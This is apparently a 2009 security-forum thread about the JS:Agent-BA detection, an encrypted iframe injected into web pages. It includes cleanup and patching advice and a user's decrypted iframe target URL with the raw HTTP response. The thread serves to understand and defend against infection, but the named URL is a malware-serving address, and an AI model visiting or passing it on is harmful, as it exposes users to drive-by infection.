hello,
has someone found information about the script worm JS:Agent-Ba Trj ?
i’cant get detailed information about this script worm…
does it attack a webserver via SQL Injection ?
Is this a part of a real Worm ?
TIA
thE_iNviNciblE
Hi the_invincible,
It is what a particular dropper drops (e.g. Schädling)
There is info about this here: http://vil.nai.com/vil/content/v_142067.htm
You could try to do a full scan with MBAM, download from here: http://www.majorgeeks.com/downloadget.php?id=5756&file=15&evp=693ee0b20204960edfd909666f809b26
For cleansing it could be that you have to temporarily disable System Restore, read:
http://www.pchell.com/virus/systemrestore.shtml
polonus
JS:Agent-BA is encrypted iframe, that is injected into legitimate html page. This detection covers many target malware servers, so “what it does” highly depends on targeted url.
Hack could be done by SQL Injection, weak/stolen password or throught some old, unpatched and vulnerable piece of software installed on your server.
Hi the_invincible,
As jsejtko declared to be protected against future (re-)infection it is of the utmost importance you have your windows version updated with the latest Service Pack(s), have all issued patches installed, are not going around the Internet with an outdated or not fully patched vulnerable browser, and make sure that all the third party software (Sun Java, Adobe reader and what have you) on it is of the latest version and fully patched, a really good tool to check that and keep checking that is Secunia PSI, to be downloaded from here: http://secunia.com/PSISetup.exe
First you could do an online scan at their site: http://secunia.com/vulnerability_scanning/online/?task=start
polonus
hello thx a lot for information about this bad javascript stuff 
i’ve decrypted the iframe stuff… it loads somethink like this here
*http://pipet.t35.com
*---------------------------------------
HTTP/1.1 302 Found
Date: Mon, 16 Feb 2009 14:35:52 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch
X-Powered-By: ModLayout/5.1
Referer:
*Location: http://pipet.t35.com?743053fb11c708a4=*
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
110
<!-- T35 Hosting Ad Code Style Begin -->
<style type="text/css">
#t35ad a{
font: 14px arial,helvetica;
text-decoration: none; }
#t35ad a:hover{
background-color: black;
color: white;
font-size:medium;
font-weight: bold; }
</style>
<!-- T35 Hosting Ad Code Style End -->
4ad
</noscript></noframes>
<!-- T35 Hosting Ad Code Begin -->
<table border="0" width="100%" cellspacing="0" cellpadding="0">
.<tr>
..<td width="20">
<!-- Start of Stat Code -->
<img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1" height="1" alt=" " border="0" />
<!-- End of Stat Code -->
</td>
..<td><div id="t35ad" align="center" style="display:block;">
<a target=_blank href=http://www.casinolistings.com>Casino Online</a> | <a target="_blank" href="http://my-weight-loss.org/free-trial-green-tea-diet/">Fast Weight Loss</a> | <a target="_blank" href="http://www.lifeinitaly.com ">Italy</a> | <a target=_blank href=http://www.hypercasinos.com>Online Casinos</a> | <a target="_blank" href="http://www.drugrehabcenter.com/">Drug Rehab</a> |
<a target=_blank href=http://www.latestcasinobonuses.com>Online Casino</a>
..</div></td>
..<td width="20"><a target="_blank" href="http://www.t35.com">
..<img border="0" src="http://freehostcp.t35.com/t35.gif" width="20" height="20" alt="Free Web Hosting" align="right" /></a></td>
.</tr>
</table>
<!-- T35 Hosting Ad Code End -->
please have a look at this topic